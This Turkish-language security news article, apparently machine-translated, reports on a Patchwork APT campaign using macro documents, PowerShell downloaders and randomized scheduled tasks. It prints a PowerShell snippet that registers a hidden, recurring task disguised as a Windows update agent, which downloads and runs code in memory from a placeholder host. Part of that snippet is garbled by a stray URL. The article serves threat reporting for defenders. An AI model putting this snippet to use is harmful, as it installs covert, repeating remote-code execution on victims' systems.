2025’in ortalarından bu yana, siber güvenlik araştırmacıları, Patchwork ileri düzeyde kalıcı tehdit (APT) kampanyalarının, Asya ve Doğu Avrupa’daki hükümet ve telekomünikasyon sektörlerini hedefleyen kampanyalarının yeniden canlanmasını izlediler.
Başlangıçta kötü niyetli ofis belgesi ekleri içeren mızrak aktı e-postalarından yararlanan bu son aktivite dalgası, sofistike kalıcılık ve yük alma taktikleri kullanan çok aşamalı bir enfeksiyon zincirine dönüşmüştür.
İlk müdahale genellikle şüphesiz bir kullanıcı, silahlandırılmış bir kelime belgesinde makroları etkinleştirdiğinde ve sessizce bir komut ve kontrol sunucusuna ulaşan gömülü bir PowerShell komut dosyasını tetiklediğinde başlar.
Oradan, Patchwork operatörleri bir dayanak, hasat kimlik bilgileri oluşturur ve tehlikeye atılan ağlar içinde uzun vadeli erişimi sürdürür.
Son haftalarda, K7 Güvenlik Laboratuarları analistleri, kalıcılıktan sorumlu PowerShell bileşeninin, uç nokta izleme çözümleriyle tespitten kaçınmak için dinamik URL üretimi ve randomize planlanmış görev adları ile geliştirildiğini belirtti.
Analistler, statik komut URL’lerinden çoklu bir yük devretme mekanizmasına geçiş belirledi ve bir indirme kaynağı engellenirse, sonraki girişimlerin hala başarılı olmasını sağladı.
Bu arıtma, Grubun birden fazla uzlaşmacı web sunucusuna yükleme hosting dağıtarak geleneksel ağ tabanlı algılama kontrollerini yenmeye odaklanmaktadır.
Bu işlemlerin etkisi, kimlik bilgisi hırsızlığından özel uzaktan erişim araçlarının konuşlandırılmasına, yanal hareket ve veri açığa çıkmasını sağlayarak değişmiştir.
Mağdurlar, planlanan görev yürütmenin göstergesi olan düzenli aralıklarla meydana gelen CPU ani ve anormal giden HTTP isteklerini bildirir.
.webp)
Birkaç durumda, operatörler, kötü niyetli DLL’leri belleğe yüklemek için meşru Windows ikili dosyalarından yararlanan ve adli analizi karmaşıklaştıran son bir yük kullandılar.
Gözlenen yükler, parola damlatma yardımcı programlarından, keyfi komutlar yürütebilen ve talep üzerine ek modüller düzenleyebilen ısmarlama C2 çerçevelerine kadar değişir.
Zamanlanmış görevler yoluyla enfeksiyon mekanizması
Patchwork’lere derin bir dalış enfeksiyon mekanizması Yük uygulamasını düzenlemek için yerel Windows yardımcı programlarından nasıl yararlandığını ortaya çıkarır.
İlk PowerShell indiricisinin yürütülmesi üzerine, kötü amaçlı yazılım, genellikle standart Windows bakım hizmetlerine benzeyen benzersiz bir görev adı oluşturur.
Bir olay tepkisi günlüğünden kurtarılan aşağıdaki PowerShell snippet’i, bu kalıcılık taktiğinin çekirdeğini göstermektedir:-
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30) -RepetitionDuration ([TimeSpan]::MaxValue)
$action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoProfile -WindowStyle Hidden -Command `"IEX ((New-Object Net.WebClient).DownloadString('http://malicious.server/update.ps1'))`""
Register-ScheduledTask -TaskName "WindowsUpdateAgent-$(https://cybersecuritynews.com/?p=128525::NewGuid().ToString())" -Trigger $trigger -Action $action -RunLevel Highest.webp)
Bu planlanan görev sessizce sık aralıklarla çalışır, diske dosya yazmadan son yükü indirip yürütür.
Kullanımı Invoke-Expression (IEX) birleşmiş New-Object Net.WebClient Kötü amaçlı yazılımların komut dosyalarını doğrudan belleğe aktarmasına izin verir ve dosya tabanlı algılamayı atlar.
İkincil yük yüklendikten sonra, operatörler özel bir arka kapı aracılığıyla tam etkileşimli erişim elde ederek kimlik bilgisi hasat ve yanal hareket sağlar.
Meşru Windows görev planlaması ve ağ API’lerini kötüye kullanarak, Patchwork başarılı bir şekilde normal sistem etkinliğine uyum sağlar ve kötü niyetli davranışları rutin bakım işlemlerinden ayırmaya çalışan savunucular için önemli zorluklar yaratır.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
